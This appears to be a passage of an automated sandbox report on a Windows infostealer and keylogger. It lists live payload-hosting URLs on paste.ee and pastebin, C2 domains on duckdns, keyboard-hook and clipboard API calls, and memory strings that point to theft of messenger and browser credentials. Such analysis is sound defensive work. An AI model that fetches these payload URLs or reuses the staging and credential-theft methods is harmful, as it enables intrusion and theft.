                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,22_2_0041B411
                    Source: global trafficHTTP traffic detected: GET /d/9xfVr/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/P0BOw/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /images/server.txt HTTP/1.1Host: simonastolerciuc.roConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/FwIIK/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: AddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: AddInProcess32.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: ftp.desckvbrat.com.br
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: simonastolerciuc.ro
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: global trafficDNS traffic detected: DNS query: janbours92harbu03.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: janbours92harbu04.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 00000005.00000002.2776493030.000001825DACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                    Source: powershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso$
                    Source: powershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso$$
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://desckvbrat.com.br
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62AB94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.desckvbrat.com.br
                    Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2955555975.000001D639BC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2616965049.00000182554D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2643079703.00000197BA9D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1DD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C1F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000005.00000002.2160647803.0000018245682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AAB82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000002.00000002.3050157640.00000136800AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2160647803.0000018245461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AA961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C1D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000005.00000002.2160647803.0000018245682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AAB82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62A10B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://simonastolerciuc.ro
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C1F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C35E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
                    Source: AddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: AddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: powershell.exe, 00000005.00000002.2774841389.000001825D7C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 00000002.00000002.3050157640.0000013680038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000002.00000002.3050157640.0000013680098000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2160647803.0000018245461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AA961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C1D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000004.00000002.3033014790.000001D641F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
                    Source: powershell.exe, 00000004.00000002.2213567570.000001D6280CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C1F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62AB94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000004.00000002.3029633737.000001D641EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.cos$?CL
                    Source: AddInProcess32.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2955555975.000001D639BC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2616965049.00000182554D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2643079703.00000197BA9D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1DD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629D73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629D73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/9xfVr/0
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B27D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/9xfVr/0P
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62A141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FwIIK/0
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B5D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/P0BOw/0
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B5D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/P0BOw/0P
                    Source: powershell.exe, 0000000D.00000002.2247922722.0000021A80492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62A107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro
                    Source: powershell.exe, 00000002.00000002.3050157640.0000013680D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/images/server.txt
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62A107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://simonastolerciuc.ro/images/sp
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: AddInProcess32.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 85.120.16.93:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49813 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000022_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,22_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,22_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,27_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,27_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,28_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,28_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,29_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,29_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,22_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,22_2_0040A41B
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
